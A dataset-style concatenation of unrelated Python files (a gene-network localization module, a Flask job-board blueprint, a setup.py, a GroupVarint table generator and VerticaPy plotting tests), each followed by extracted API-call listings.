LCC_list.append(len(G_sub_temp.nodes()))
# LLC calc on random sample
G_sub_temp = nx.Graph(nx.subgraph(Gint, seed_random))
G_sub_temp = max(nx.connected_component_subgraphs(G_sub_temp), key=len)
LCC_rand.append(len(G_sub_temp.nodes()))
if plot == True:
if (method == 'numedges') or (method == 'both'):
fig, ax = plt.subplots(figsize = (12, 7))
sns.distplot(numedges_list, ax = ax, hist = True, label = 'focal genes')
sns.distplot(numedges_rand, ax = ax, hist = True, label = 'random set')
plt.ylabel('frequency', fontsize = 16)
plt.xlabel('number of edges', fontsize = 16)
plt.title('Number of Edges Localization', fontsize = 18)
plt.legend(loc = 'upper right', fontsize = 14)
if (method == 'LCC') or (method == 'both'):
fig, ax = plt.subplots(figsize = (12, 7))
sns.distplot(LCC_list, ax = ax, hist = True, label = 'focal genes')
sns.distplot(LCC_rand, ax = ax, hist = True, label = 'random set')
plt.ylabel('frequency', fontsize = 16)
plt.xlabel('largest connected component size', fontsize = 16)
plt.title('Largest Connected Component Localization', fontsize = 18)
plt.legend(loc = 'upper right', fontsize = 14)
return numedges_list, numedges_rand, LCC_list, LCC_rand
def localization_full(Gint, focal_genes,
num_reps = 200,
method = 'LCC',
print_counter = False,
label = 'focal genes',
line_height = 0.1,
legend_loc = 'upper left'):
"""
Function to calculate localization of an input set of genes (focal_genes) on a background network (Gint).
Option to compute number of edges (method = 'numedges') or largest connected component (method = 'LLC')
localization analysis. DOes no sub-sampling. Plots the distribution of random gene localizaiton, and
marks the focal set localization on distribution. Includes p-value of focal set localization.
Args:
Gint: Networkx Graph, background network to randomly sample from
focal_genes: List, set of genes to calculate localization of
num_reps: Int, number of times to randomly sample
method: String, to decide which type of localization analysis to run. Options: 'numedges', 'LLC', or 'both'.
print_counter: Bool, whether to print a counter that tells you which iteration you are on (every 25 iterations).
Useful when the num_reps is very high.
label: String, label for focal genes in graph legend
line_height: Float, the height of the red line that marks the focal gene localization
legend_loc: String, relative position of legend in graph. Something similar to 'upper left'.
Returns:
numedges_list: List, the number of edges calculated for each rep, over focal genes.
Empty if method = 'LLC'.
numedges_rand: List, the number of edges calculated for each rep, over random genes of
similar degree in the background network. Empty if method = 'LLC'.
LCC_list: List, the size of the largest connected component, calculated for each rep, over focal genes.
Empty if method = 'numedges'.
LCC_rand: List, the size of the largest connected component, calculated for each rep, over random genes of
similar degree in the background network. Empty if method = 'numedges'.
"""
numedges_list, numedges_rand, LCC_list, LCC_rand = localization(Gint, focal_genes, num_reps,
sample_frac = 1,
method = method,
plot = False,
print_counter = print_counter)
if method == 'numedges':
analysis_list = numedges_list
analysis_rand = numedges_rand
title = 'number of edges'
else:
analysis_list = LCC_list
analysis_rand = LCC_rand
title = 'largest connected component'
# plot distributions for non-sampled case
fig, ax = plt.subplots(figsize = (12, 7))
sns.set_style('white')
plt.vlines(np.mean(analysis_list), ymin = 0, ymax = line_height, color = 'r', lw = 2, label = label)
sns.kdeplot(analysis_rand, ax = ax, color = 'k', lw = 2, alpha = 0.5, shade = True, label = 'random')
plt.legend(loc = legend_loc, fontsize = 12)
plt.ylabel('frequency', fontsize = 16)
plt.xlabel(title, fontsize = 16)
# print the z-score and fdr
analysis_z = (np.mean(analysis_list) - np.mean(analysis_rand))/float(np.std(analysis_rand))
print(1 - ndtr(analysis_z))
plt.title('permutation p = ' + str(1 - ndtr(analysis_z)))
return numedges_list, numedges_rand, LCC_list, LCC_rand
def get_degree_binning(g, bin_size, lengths = None):
"""
Helper function for localization(). This function comes from network_utilities.py of emregtoobox. https://github.com/emreg00/toolbox
"""
degree_to_nodes = {}
if sys.version_info >= (3, 0):
for node, degree in dict(g.degree()).items():
if lengths is not None and node not in lengths:
continue
degree_to_nodes.setdefault(degree, []).append(node)
else:
for node, degree in dict(g.degree()).iteritems():
if lengths is not None and node not in lengths:
continue
degree_to_nodes.setdefault(degree, []).append(node)
values = list(degree_to_nodes.keys())
values.sort()
bins = []
i = 0
while i < len(values):
low = values[i]
val = degree_to_nodes[values[i]]
while len(val) < bin_size:
i += 1
if i == len(values):
break
val.extend(degree_to_nodes[values[i]])
if i == len(values):
i -= 1
high = values[i]
i += 1
#print low, high, len(val)
if len(val) < bin_size:
low_, high_, val_ = bins[-1]
bins[-1] = (low_, high, val_ + val)
else:
bins.append((low, high, val))
return bins
|
[
"pandas.DataFrame",
"seaborn.set_style",
"matplotlib.pyplot.title",
"seaborn.kdeplot",
"networkx.degree",
"numpy.std",
"matplotlib.pyplot.legend",
"scipy.special.ndtr",
"numpy.mean",
"seaborn.distplot",
"networkx.subgraph",
"matplotlib.pyplot.ylabel",
"networkx.connected_component_subgraphs",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.subplots",
"numpy.random.shuffle"
] |
[((2872, 2972), 'pandas.DataFrame', 'pd.DataFrame', (["{'min_degree': min_degree, 'max_degree': max_degree, 'genes_binned':\n genes_binned}"], {}), "({'min_degree': min_degree, 'max_degree': max_degree,\n 'genes_binned': genes_binned})\n", (2884, 2972), True, 'import pandas as pd\n'), ((10006, 10035), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(12, 7)'}), '(figsize=(12, 7))\n', (10018, 10035), True, 'import matplotlib.pyplot as plt\n'), ((10042, 10064), 'seaborn.set_style', 'sns.set_style', (['"""white"""'], {}), "('white')\n", (10055, 10064), True, 'import seaborn as sns\n'), ((10175, 10268), 'seaborn.kdeplot', 'sns.kdeplot', (['analysis_rand'], {'ax': 'ax', 'color': '"""k"""', 'lw': '(2)', 'alpha': '(0.5)', 'shade': '(True)', 'label': '"""random"""'}), "(analysis_rand, ax=ax, color='k', lw=2, alpha=0.5, shade=True,\n label='random')\n", (10186, 10268), True, 'import seaborn as sns\n'), ((10281, 10320), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': 'legend_loc', 'fontsize': '(12)'}), '(loc=legend_loc, fontsize=12)\n', (10291, 10320), True, 'import matplotlib.pyplot as plt\n'), ((10329, 10365), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""frequency"""'], {'fontsize': '(16)'}), "('frequency', fontsize=16)\n", (10339, 10365), True, 'import matplotlib.pyplot as plt\n'), ((10372, 10402), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['title'], {'fontsize': '(16)'}), '(title, fontsize=16)\n', (10382, 10402), True, 'import matplotlib.pyplot as plt\n'), ((3864, 3891), 'numpy.random.shuffle', 'np.random.shuffle', (['focal_80'], {}), '(focal_80)\n', (3881, 3891), True, 'import numpy as np\n'), ((10081, 10103), 'numpy.mean', 'np.mean', (['analysis_list'], {}), '(analysis_list)\n', (10088, 10103), True, 'import numpy as np\n'), ((4095, 4113), 'networkx.degree', 'nx.degree', (['Gint', 'g'], {}), '(Gint, g)\n', (4104, 4113), True, 'import networkx as nx\n'), ((4252, 4281), 'numpy.random.shuffle', 'np.random.shuffle', (['genes_temp'], {}), '(genes_temp)\n', (4269, 4281), True, 'import numpy as np\n'), ((5839, 5868), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(12, 7)'}), '(figsize=(12, 7))\n', (5851, 5868), True, 'import matplotlib.pyplot as plt\n'), ((5883, 5949), 'seaborn.distplot', 'sns.distplot', (['numedges_list'], {'ax': 'ax', 'hist': '(True)', 'label': '"""focal genes"""'}), "(numedges_list, ax=ax, hist=True, label='focal genes')\n", (5895, 5949), True, 'import seaborn as sns\n'), ((5968, 6033), 'seaborn.distplot', 'sns.distplot', (['numedges_rand'], {'ax': 'ax', 'hist': '(True)', 'label': '"""random set"""'}), "(numedges_rand, ax=ax, hist=True, label='random set')\n", (5980, 6033), True, 'import seaborn as sns\n'), ((6052, 6088), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""frequency"""'], {'fontsize': '(16)'}), "('frequency', fontsize=16)\n", (6062, 6088), True, 'import matplotlib.pyplot as plt\n'), ((6103, 6145), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""number of edges"""'], {'fontsize': '(16)'}), "('number of edges', fontsize=16)\n", (6113, 6145), True, 'import matplotlib.pyplot as plt\n'), ((6160, 6214), 'matplotlib.pyplot.title', 'plt.title', (['"""Number of Edges Localization"""'], {'fontsize': '(18)'}), "('Number of Edges Localization', fontsize=18)\n", (6169, 6214), True, 'import matplotlib.pyplot as plt\n'), ((6229, 6271), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""upper right"""', 'fontsize': '(14)'}), "(loc='upper right', fontsize=14)\n", (6239, 6271), True, 'import matplotlib.pyplot as plt\n'), ((6367, 6396), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(12, 7)'}), '(figsize=(12, 7))\n', (6379, 6396), True, 'import matplotlib.pyplot as plt\n'), ((6411, 6472), 'seaborn.distplot', 'sns.distplot', (['LCC_list'], {'ax': 'ax', 'hist': '(True)', 'label': '"""focal genes"""'}), "(LCC_list, ax=ax, hist=True, label='focal genes')\n", (6423, 6472), True, 'import seaborn as sns\n'), ((6491, 6551), 'seaborn.distplot', 'sns.distplot', (['LCC_rand'], {'ax': 'ax', 'hist': '(True)', 'label': '"""random set"""'}), "(LCC_rand, ax=ax, hist=True, label='random set')\n", (6503, 6551), True, 'import seaborn as sns\n'), ((6570, 6606), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""frequency"""'], {'fontsize': '(16)'}), "('frequency', fontsize=16)\n", (6580, 6606), True, 'import matplotlib.pyplot as plt\n'), ((6621, 6680), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""largest connected component size"""'], {'fontsize': '(16)'}), "('largest connected component size', fontsize=16)\n", (6631, 6680), True, 'import matplotlib.pyplot as plt\n'), ((6695, 6761), 'matplotlib.pyplot.title', 'plt.title', (['"""Largest Connected Component Localization"""'], {'fontsize': '(18)'}), "('Largest Connected Component Localization', fontsize=18)\n", (6704, 6761), True, 'import matplotlib.pyplot as plt\n'), ((6776, 6818), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""upper right"""', 'fontsize': '(14)'}), "(loc='upper right', fontsize=14)\n", (6786, 6818), True, 'import matplotlib.pyplot as plt\n'), ((10456, 10478), 'numpy.mean', 'np.mean', (['analysis_list'], {}), '(analysis_list)\n', (10463, 10478), True, 'import numpy as np\n'), ((10481, 10503), 'numpy.mean', 'np.mean', (['analysis_rand'], {}), '(analysis_rand)\n', (10488, 10503), True, 'import numpy as np\n'), ((10511, 10532), 'numpy.std', 'np.std', (['analysis_rand'], {}), '(analysis_rand)\n', (10517, 10532), True, 'import numpy as np\n'), ((10549, 10565), 'scipy.special.ndtr', 'ndtr', (['analysis_z'], {}), '(analysis_z)\n', (10553, 10565), False, 'from scipy.special import ndtr\n'), ((4483, 4512), 'numpy.random.shuffle', 'np.random.shuffle', (['genes_temp'], {}), '(genes_temp)\n', (4500, 4512), True, 'import numpy as np\n'), ((5310, 5337), 'networkx.subgraph', 'nx.subgraph', (['Gint', 'focal_80'], {}), '(Gint, focal_80)\n', (5321, 5337), True, 'import networkx as nx\n'), ((5368, 5412), 'networkx.connected_component_subgraphs', 'nx.connected_component_subgraphs', (['G_sub_temp'], {}), '(G_sub_temp)\n', (5400, 5412), True, 'import networkx as nx\n'), ((5565, 5595), 'networkx.subgraph', 'nx.subgraph', (['Gint', 'seed_random'], {}), '(Gint, seed_random)\n', (5576, 5595), True, 'import networkx as nx\n'), ((5626, 5670), 'networkx.connected_component_subgraphs', 'nx.connected_component_subgraphs', (['G_sub_temp'], {}), '(G_sub_temp)\n', (5658, 5670), True, 'import networkx as nx\n'), ((10611, 10627), 'scipy.special.ndtr', 'ndtr', (['analysis_z'], {}), '(analysis_z)\n', (10615, 10627), False, 'from scipy.special import ndtr\n'), ((4887, 4914), 'networkx.subgraph', 'nx.subgraph', (['Gint', 'focal_80'], {}), '(Gint, focal_80)\n', (4898, 4914), True, 'import networkx as nx\n'), ((5070, 5100), 'networkx.subgraph', 'nx.subgraph', (['Gint', 'seed_random'], {}), '(Gint, seed_random)\n', (5081, 5100), True, 'import networkx as nx\n')]
|
from app import app
from app import db
from datetime import datetime
from flask import Blueprint
from flask import render_template
from flask import redirect
from flask import url_for
from flask import request
from flask import flash
from flask_login import current_user
from flask_login import login_required
from app.models.job import Job
from app.forms.job_form import JobSubmissionForm
from app.helper.auth_helper import requires_roles
job = Blueprint("job", __name__)
@job.route("/job", methods=["GET"])
def listing():
jobs = Job.query.filter_by(is_active=True, is_removed=False).all()
return render_template("/job/list.html", title="opening jobs", jobs=jobs)
@job.route("/job/<int:id>", methods=["GET"])
def view(id):
jobs = Job.query.get(int(id))
return render_template("/job/detail.html", title="job detail", jobs=jobs)
@job.route("/job/submit", methods=["GET", "POST"])
@login_required
def submit():
form = JobSubmissionForm()
if form.validate_on_submit():
jobs = Job(
title=form.title.data,
company=form.company.data,
location=form.location.data,
description=form.description.data,
skills=form.skills.data,
website=form.website.data,
contact=form.contact.data,
employment=form.employment.data,
on_site=form.on_site.data,
)
jobs.user_id = current_user.id
jobs.created_at = datetime.utcnow()
db.session.add(jobs)
db.session.commit()
return redirect(url_for("job.listing"))
return render_template("/job/submit.html", title="job submission", form=form)
@job.route("/job/moderation", methods=["GET"])
@login_required
@requires_roles("admin", "momod")
def moderation():
jobs = Job.query.all()
return render_template("/job/moderation.html", title="jobs moderation", jobs=jobs)
@job.route("/job/remove/<int:id>", methods=["GET"])
@login_required
@requires_roles("admin", "momod")
def remove(id):
jobs = Job.query.get(int(id))
jobs.is_removed = True
db.session.commit()
return redirect(url_for("job.moderation"))
@job.route("/job/activate/<int:id>", methods=["GET"])
@login_required
@requires_roles("admin", "momod")
def activate(id):
jobs = Job.query.get(int(id))
jobs.is_active = True
db.session.commit()
return redirect(url_for("job.moderation"))
|
[
"app.models.job.Job.query.all",
"flask.Blueprint",
"app.forms.job_form.JobSubmissionForm",
"app.helper.auth_helper.requires_roles",
"datetime.datetime.utcnow",
"flask.url_for",
"app.db.session.commit",
"flask.render_template",
"app.models.job.Job.query.filter_by",
"app.db.session.add",
"app.models.job.Job"
] |
[((451, 477), 'flask.Blueprint', 'Blueprint', (['"""job"""', '__name__'], {}), "('job', __name__)\n", (460, 477), False, 'from flask import Blueprint\n'), ((1728, 1760), 'app.helper.auth_helper.requires_roles', 'requires_roles', (['"""admin"""', '"""momod"""'], {}), "('admin', 'momod')\n", (1742, 1760), False, 'from app.helper.auth_helper import requires_roles\n'), ((1964, 1996), 'app.helper.auth_helper.requires_roles', 'requires_roles', (['"""admin"""', '"""momod"""'], {}), "('admin', 'momod')\n", (1978, 1996), False, 'from app.helper.auth_helper import requires_roles\n'), ((2218, 2250), 'app.helper.auth_helper.requires_roles', 'requires_roles', (['"""admin"""', '"""momod"""'], {}), "('admin', 'momod')\n", (2232, 2250), False, 'from app.helper.auth_helper import requires_roles\n'), ((613, 679), 'flask.render_template', 'render_template', (['"""/job/list.html"""'], {'title': '"""opening jobs"""', 'jobs': 'jobs'}), "('/job/list.html', title='opening jobs', jobs=jobs)\n", (628, 679), False, 'from flask import render_template\n'), ((786, 852), 'flask.render_template', 'render_template', (['"""/job/detail.html"""'], {'title': '"""job detail"""', 'jobs': 'jobs'}), "('/job/detail.html', title='job detail', jobs=jobs)\n", (801, 852), False, 'from flask import render_template\n'), ((947, 966), 'app.forms.job_form.JobSubmissionForm', 'JobSubmissionForm', ([], {}), '()\n', (964, 966), False, 'from app.forms.job_form import JobSubmissionForm\n'), ((1591, 1661), 'flask.render_template', 'render_template', (['"""/job/submit.html"""'], {'title': '"""job submission"""', 'form': 'form'}), "('/job/submit.html', title='job submission', form=form)\n", (1606, 1661), False, 'from flask import render_template\n'), ((1790, 1805), 'app.models.job.Job.query.all', 'Job.query.all', ([], {}), '()\n', (1803, 1805), False, 'from app.models.job import Job\n'), ((1817, 1892), 'flask.render_template', 'render_template', (['"""/job/moderation.html"""'], {'title': '"""jobs moderation"""', 'jobs': 'jobs'}), "('/job/moderation.html', title='jobs moderation', jobs=jobs)\n", (1832, 1892), False, 'from flask import render_template\n'), ((2078, 2097), 'app.db.session.commit', 'db.session.commit', ([], {}), '()\n', (2095, 2097), False, 'from app import db\n'), ((2333, 2352), 'app.db.session.commit', 'db.session.commit', ([], {}), '()\n', (2350, 2352), False, 'from app import db\n'), ((1016, 1287), 'app.models.job.Job', 'Job', ([], {'title': 'form.title.data', 'company': 'form.company.data', 'location': 'form.location.data', 'description': 'form.description.data', 'skills': 'form.skills.data', 'website': 'form.website.data', 'contact': 'form.contact.data', 'employment': 'form.employment.data', 'on_site': 'form.on_site.data'}), '(title=form.title.data, company=form.company.data, location=form.\n location.data, description=form.description.data, skills=form.skills.\n data, website=form.website.data, contact=form.contact.data, employment=\n form.employment.data, on_site=form.on_site.data)\n', (1019, 1287), False, 'from app.models.job import Job\n'), ((1457, 1474), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (1472, 1474), False, 'from datetime import datetime\n'), ((1483, 1503), 'app.db.session.add', 'db.session.add', (['jobs'], {}), '(jobs)\n', (1497, 1503), False, 'from app import db\n'), ((1512, 1531), 'app.db.session.commit', 'db.session.commit', ([], {}), '()\n', (1529, 1531), False, 'from app import db\n'), ((2118, 2143), 'flask.url_for', 'url_for', (['"""job.moderation"""'], {}), "('job.moderation')\n", (2125, 2143), False, 'from flask import url_for\n'), ((2373, 2398), 'flask.url_for', 'url_for', (['"""job.moderation"""'], {}), "('job.moderation')\n", (2380, 2398), False, 'from flask import url_for\n'), ((542, 595), 'app.models.job.Job.query.filter_by', 'Job.query.filter_by', ([], {'is_active': '(True)', 'is_removed': '(False)'}), '(is_active=True, is_removed=False)\n', (561, 595), False, 'from app.models.job import Job\n'), ((1556, 1578), 'flask.url_for', 'url_for', (['"""job.listing"""'], {}), "('job.listing')\n", (1563, 1578), False, 'from flask import url_for\n')]
|
import setuptools
import datacite_rest as meta
with open('README.md', 'r', encoding='utf-8') as fh:
long_description = fh.read()
install_requires = [
'pydantic>=1.8.1,<1.9',
'pyhumps>=1.6.1,<1.7',
'requests>=2.25.1,<2.26'
]
tests_require = install_requires + ['pytest']
setuptools.setup(
name=meta.__title__,
version=meta.__version__,
author=meta.__author__,
author_email=meta.__author_email__,
description=meta.__description__,
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/pypa/sampleproject',
license=meta.__license__,
project_urls={
'Bug Tracker': 'https://github.com/pypa/sampleproject/issues',
},
install_requires=install_requires,
tests_require=tests_require,
classifiers=[
'Programming Language :: Python :: 3',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
],
packages=setuptools.find_packages(),
python_requires='>=3.6',
)
|
[
"setuptools.find_packages"
] |
[((989, 1015), 'setuptools.find_packages', 'setuptools.find_packages', ([], {}), '()\n', (1013, 1015), False, 'import setuptools\n')]
|
#!/usr/bin/env python
#
# Generate tables for GroupVarint32
# Copyright 2011 Facebook
#
# @author <NAME> (<EMAIL>)
#
# Reference: http://www.stepanovpapers.com/CIKM_2011.pdf
#
# From 17 encoded bytes, we may use between 5 and 17 bytes to encode 4
# integers. The first byte is a key that indicates how many bytes each of
# the 4 integers takes:
#
# bit 0..1: length-1 of first integer
# bit 2..3: length-1 of second integer
# bit 4..5: length-1 of third integer
# bit 6..7: length-1 of fourth integer
#
# The value of the first byte is used as the index in a table which returns
# a mask value for the SSSE3 PSHUFB instruction, which takes an XMM register
# (16 bytes) and shuffles bytes from it into a destination XMM register
# (optionally setting some of them to 0)
#
# For example, if the key has value 4, that means that the first integer
# uses 1 byte, the second uses 2 bytes, the third and fourth use 1 byte each,
# so we set the mask value so that
#
# r[0] = a[0]
# r[1] = 0
# r[2] = 0
# r[3] = 0
#
# r[4] = a[1]
# r[5] = a[2]
# r[6] = 0
# r[7] = 0
#
# r[8] = a[3]
# r[9] = 0
# r[10] = 0
# r[11] = 0
#
# r[12] = a[4]
# r[13] = 0
# r[14] = 0
# r[15] = 0
import os
from optparse import OptionParser
OUTPUT_FILE = "GroupVarintTables.cpp"
def generate(f):
f.write("""
#include "folly/Portability.h"
#if FOLLY_X64 || defined(__i386__)
#include <stdint.h>
#include <x86intrin.h>
namespace folly {
namespace detail {
extern const __m128i groupVarintSSEMasks[] = {
""")
# Compute SSE masks
for i in range(0, 256):
offset = 0
vals = [0, 0, 0, 0]
for j in range(0, 4):
d = 1 + ((i >> (2 * j)) & 3)
# the j'th integer uses d bytes, consume them
for k in range(0, d):
vals[j] |= offset << (8 * k)
offset += 1
# set remaining bytes in result to 0
# 0xff: set corresponding byte in result to 0
for k in range(d, 4):
vals[j] |= 0xff << (8 * k)
f.write(" {{static_cast<int64_t>(0x{1:08x}{0:08x}), "
"static_cast<int64_t>(0x{3:08x}{2:08x})}},\n".format(*vals))
f.write("};\n"
"\n"
"extern const uint8_t groupVarintLengths[] = {\n")
# Also compute total encoded lengths, including key byte
for i in range(0, 256):
offset = 1 # include key byte
for j in range(0, 4):
d = 1 + ((i >> (2 * j)) & 3)
offset += d
f.write(" {0},\n".format(offset))
f.write("""
};
} // namespace detail
} // namespace folly
#endif /* FOLLY_X64 || defined(__i386__) */
""")
def main():
parser = OptionParser()
parser.add_option("--install_dir", dest="install_dir", default=".",
help="write output to DIR", metavar="DIR")
parser.add_option("--fbcode_dir")
(options, args) = parser.parse_args()
f = open(os.path.join(options.install_dir, OUTPUT_FILE), "w")
generate(f)
f.close()
if __name__ == "__main__":
main()
|
[
"os.path.join",
"optparse.OptionParser"
] |
[((2646, 2660), 'optparse.OptionParser', 'OptionParser', ([], {}), '()\n', (2658, 2660), False, 'from optparse import OptionParser\n'), ((2891, 2937), 'os.path.join', 'os.path.join', (['options.install_dir', 'OUTPUT_FILE'], {}), '(options.install_dir, OUTPUT_FILE)\n', (2903, 2937), False, 'import os\n')]
|
# (c) Copyright [2018-2021] Micro Focus or one of its affiliates.
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest, datetime, warnings
from verticapy import vDataFrame, drop_table, create_verticapy_schema
import matplotlib.pyplot as plt
from verticapy import set_option
set_option("print_info", False)
@pytest.fixture(scope="module")
def titanic_vd(base):
from verticapy.learn.datasets import load_titanic
titanic = load_titanic(cursor=base.cursor)
yield titanic
with warnings.catch_warnings(record=True) as w:
drop_table(
name="public.titanic", cursor=base.cursor,
)
@pytest.fixture(scope="module")
def amazon_vd(base):
from verticapy.learn.datasets import load_amazon
amazon = load_amazon(cursor=base.cursor)
yield amazon
drop_table(
name="public.amazon", cursor=base.cursor,
)
@pytest.fixture(scope="module")
def iris_vd(base):
from verticapy.learn.datasets import load_iris
iris = load_iris(cursor=base.cursor)
yield iris
drop_table(
name="public.iris", cursor=base.cursor,
)
@pytest.fixture(scope="module")
def world_vd(base):
from verticapy.learn.datasets import load_world
cities = load_world(cursor=base.cursor)
yield cities
with warnings.catch_warnings(record=True) as w:
drop_table(
name="public.world", cursor=base.cursor,
)
class TestvDFPlot:
def test_vDF_stacked_area(self, amazon_vd):
assert (
len(
amazon_vd.pivot("date", "state", "number")
.stacked_area("date", ["ACRE", "BAHIA"])
.get_default_bbox_extra_artists()
)
== 12
)
plt.close()
assert (
len(
amazon_vd.pivot("date", "state", "number")
.stacked_area("date", ["ACRE", "BAHIA"], fully=True)
.get_default_bbox_extra_artists()
)
== 12
)
plt.close()
def test_vDF_bar(self, titanic_vd):
# testing vDataFrame[].bar
# auto
result = titanic_vd["fare"].bar()
assert result.get_default_bbox_extra_artists()[0].get_width() == pytest.approx(
0.7965964343598055
)
assert result.get_default_bbox_extra_artists()[1].get_width() == pytest.approx(
0.12236628849270664
)
assert result.get_yticks()[1] == pytest.approx(42.694100000000006)
plt.close()
# method=sum of=survived and bins=5
result2 = titanic_vd["fare"].bar(method="sum", of="survived", bins=5)
assert result2.get_default_bbox_extra_artists()[0].get_width() == pytest.approx(
391
)
assert result2.get_default_bbox_extra_artists()[1].get_width() == pytest.approx(
34
)
assert result2.get_yticks()[1] == pytest.approx(102.46583999999999)
plt.close()
# testing vDataFrame.bar
# auto & stacked
for hist_type in ["auto", "stacked"]:
result3 = titanic_vd.bar(
columns=["pclass", "survived"],
method="50%",
of="fare",
hist_type=hist_type,
)
assert result3.get_default_bbox_extra_artists()[
0
].get_width() == pytest.approx(50.0)
assert result3.get_default_bbox_extra_artists()[
3
].get_width() == pytest.approx(77.9583)
plt.close()
# fully_stacked
result4 = titanic_vd.bar(
columns=["pclass", "survived"], hist_type="fully_stacked"
)
assert result4.get_default_bbox_extra_artists()[0].get_width() == pytest.approx(
0.38782051282051283
)
assert result4.get_default_bbox_extra_artists()[3].get_width() == pytest.approx(
0.6121794871794872
)
plt.close()
# pyramid
result5 = titanic_vd.bar(columns=["pclass", "survived"], hist_type="pyramid")
assert result5.get_default_bbox_extra_artists()[0].get_width() == pytest.approx(
0.09805510534846029
)
assert result5.get_default_bbox_extra_artists()[3].get_width() == pytest.approx(
-0.1547811993517018
)
def test_vDF_boxplot(self, titanic_vd):
# testing vDataFrame[].boxplot
result = titanic_vd["age"].boxplot()
assert result.get_default_bbox_extra_artists()[0].get_data()[0][
0
] == pytest.approx(16.07647847)
assert result.get_default_bbox_extra_artists()[1].get_data()[0][
0
] == pytest.approx(36.25)
plt.close()
# testing vDataFrame.boxplot
result = titanic_vd.boxplot(columns=["age", "fare"])
assert result.get_default_bbox_extra_artists()[6].get_data()[1][
0
] == pytest.approx(31.3875)
assert result.get_default_bbox_extra_artists()[6].get_data()[1][
1
] == pytest.approx(512.3292)
plt.close()
def test_vDF_bubble(self, iris_vd):
# testing vDataFrame.bubble
result = iris_vd.bubble(
columns=["PetalLengthCm", "SepalLengthCm"], size_bubble_col="PetalWidthCm"
)
result = result.get_default_bbox_extra_artists()[0]
assert max([elem[0] for elem in result.get_offsets().data]) == 6.9
assert max([elem[1] for elem in result.get_offsets().data]) == 7.9
plt.close()
# testing vDataFrame.scatter using parameter catcol
result2 = iris_vd.bubble(
columns=["PetalLengthCm", "SepalLengthCm"],
size_bubble_col="PetalWidthCm",
catcol="Species",
)
result2 = result2.get_default_bbox_extra_artists()[0]
assert max([elem[0] for elem in result2.get_offsets().data]) <= 6.9
assert max([elem[1] for elem in result2.get_offsets().data]) <= 7.9
plt.close()
def test_vDF_density(self, iris_vd):
# testing vDataFrame[].density
try:
create_verticapy_schema(iris_vd._VERTICAPY_VARIABLES_["cursor"])
except:
pass
for kernel in ["gaussian", "logistic", "sigmoid", "silverman"]:
result = iris_vd["PetalLengthCm"].density(kernel=kernel, nbins=20)
assert max(result.get_default_bbox_extra_artists()[1].get_data()[1]) < 0.25
plt.close()
# testing vDataFrame.density
for kernel in ["gaussian", "logistic", "sigmoid", "silverman"]:
result = iris_vd.density(kernel=kernel, nbins=20)
assert max(result.get_default_bbox_extra_artists()[5].get_data()[1]) < 0.37
plt.close()
def test_vDF_geo_plot(self, world_vd):
assert (
len(
world_vd["geometry"]
.geo_plot(column="pop_est", cmap="Reds")
.get_default_bbox_extra_artists()
)
== 8
)
plt.close()
@pytest.mark.skip(reason="test not implemented")
def test_vDF_hchart(self):
pass
def test_vDF_heatmap(self, iris_vd):
result = iris_vd.heatmap(
["PetalLengthCm", "SepalLengthCm"],
method="avg",
of="SepalWidthCm",
h=(1, 1),
)
assert result.get_default_bbox_extra_artists()[-2].get_size() == (5, 4)
plt.close()
def test_vDF_hexbin(self, titanic_vd):
result = titanic_vd.hexbin(columns=["age", "fare"], method="avg", of="survived")
result = result.get_default_bbox_extra_artists()[0]
assert max([elem[0] for elem in result.get_offsets()]) == pytest.approx(
80.00000007967, 1e-2
)
assert max([elem[1] for elem in result.get_offsets()]) == pytest.approx(
512.3292, 1e-2
)
plt.close()
def test_vDF_hist(self, titanic_vd):
# testing vDataFrame[].hist
# auto
result = titanic_vd["age"].hist()
assert result.get_default_bbox_extra_artists()[0].get_height() == pytest.approx(
0.050243111831442464
)
assert result.get_default_bbox_extra_artists()[1].get_height() == pytest.approx(
0.029983792544570502
)
assert result.get_xticks()[1] == pytest.approx(7.24272727)
plt.close()
# method=avg of=survived and h=15
result2 = titanic_vd["age"].hist(method="avg", of="survived", h=15)
assert result2.get_default_bbox_extra_artists()[
0
].get_height() == pytest.approx(0.534653465346535)
assert result2.get_default_bbox_extra_artists()[
1
].get_height() == pytest.approx(0.354838709677419)
assert result2.get_xticks()[1] == pytest.approx(15)
plt.close()
# testing vDataFrame.hist
# auto & stacked
for hist_type in ["auto", "stacked"]:
result3 = titanic_vd.hist(
columns=["pclass", "sex"],
method="avg",
of="survived",
hist_type=hist_type,
)
assert result3.get_default_bbox_extra_artists()[
0
].get_height() == pytest.approx(0.964285714285714)
assert result3.get_default_bbox_extra_artists()[
3
].get_height() == pytest.approx(0.325581395348837)
plt.close()
# multi
result4 = titanic_vd.hist(columns=["fare", "age"], hist_type="multi")
assert result4.get_default_bbox_extra_artists()[
0
].get_height() == pytest.approx(0.07374392220421394)
assert result4.get_default_bbox_extra_artists()[
1
].get_height() == pytest.approx(0.4327390599675851)
plt.close()
def test_vDF_pie(self, titanic_vd):
# testing vDataFrame[].pie
result = titanic_vd["pclass"].pie(method="avg", of="survived")
assert int(result.get_default_bbox_extra_artists()[6].get_text()) == 3
assert float(
result.get_default_bbox_extra_artists()[7].get_text()
) == pytest.approx(0.227753)
plt.close()
# testing vDataFrame.pie
result = titanic_vd.pie(["sex", "pclass"])
assert result.get_default_bbox_extra_artists()[9].get_text() == "11.3%"
plt.close()
